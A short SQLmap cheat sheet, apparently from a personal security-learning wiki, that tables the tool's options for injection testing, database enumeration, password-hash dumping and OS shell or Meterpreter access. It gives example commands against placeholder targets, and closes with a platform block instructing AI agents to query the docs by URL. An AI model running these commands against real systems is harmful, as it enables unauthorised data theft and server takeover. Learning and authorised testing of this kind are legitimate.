# SQLmap quick cheat sheet

## Cheat Sheet commands

### **Basic** commands

| **Options**       | **Description**                                         |
| ----------------- | ------------------------------------------------------- |
| -u URL, --url=URL | Target URL (e.g. "<http://www.site.com/vuln.php?id=1>") |
| --data=DATA       | Data string to be sent through POST (e.g. "id=1")       |
| --random-agent    | Use randomly selected HTTP User-Agent header value      |
| -p TESTPARAMETER  | Testable parameter(s)                                   |
| --level=LEVEL     | Level of tests to perform (1-5, default 1)              |
| --risk=RISK       | Risk of tests to perform (1-3, default 1)               |

### **Enumeration** commands

| Options          | Description                                |
| ---------------- | ------------------------------------------ |
| -a, --all        | Retrieve everything                        |
| -b, --banner     | Retrieve DBMS banner                       |
| --current-user   | Retrieve DBMS current user                 |
| --current-db     | Retrieve DBMS current database             |
| --passwords      | Enumerate DBMS users password hashes       |
| --dbs            | Enumerate DBMS databases                   |
| --tables         | Enumerate DBMS database tables             |
| --columns        | Enumerate DBMS database table columns      |
| --schema         | Enumerate DBMS schema                      |
| --dump           | Dump DBMS database table entries           |
| --dump-all       | Dump all DBMS databases tables entries     |
| --is-dba         | Detect if the DBMS current user is DBA     |
| -D \<DB NAME>    | DBMS database to enumerate                 |
| -T \<TABLE NAME> | DBMS database table(s) to enumerate        |
| -C COL           | DBMS database table column(s) to enumerate |

### Operating System access commands

| **Options**    | **Description**                                       |
| -------------- | ----------------------------------------------------- |
| --os-shell     | Prompt for an interactive operating system shell      |
| --os-pwn       | Prompt for an OOB shell, Meterpreter or VNC           |
| --os-cmd=OSCMD | Execute an operating system command                   |
| --priv-esc     | Database process user privilege escalation            |
| --os-smbrelay  | One-click prompt for an OOB shell, Meterpreter or VNC |

***

#### **Simple HTTP GET Based Test (Databases)**

```bash
sqlmap -u <https://testsite.com/page.php?id=7> --dbs
```

#### **Simple HTTP POST Based Test (Databases)**

```bash
sqlmap -r <request_file> -p <vulnerable_parameter> --dbs
```

> *get the `request_file` from Burp Suite*

***

#### **Using GET based Method (Tables)**

```bash
sqlmap -u <https://testsite.com/page.php?id=7> -D <database_name> --tables
```

#### **Using POST based Method (Tables)**

```bash
sqlmap -r req.txt -D <database_name> --tables
```

***

#### **Using GET based Method (Columns)**

{% code overflow="wrap" %}

```basic
sqlmap -u <https://testsite.com/page.php?id=7> -D <database_name> -T <table_name> --columns
```

{% endcode %}

#### **Using POST based Method (Columns)**

```bash
sqlmap -r req.txt -D <database_name> -T <table_name> --columns
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://meitoka.gitbook.io/stash/learning/sqli/sqlmap-quick-cheat-sheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.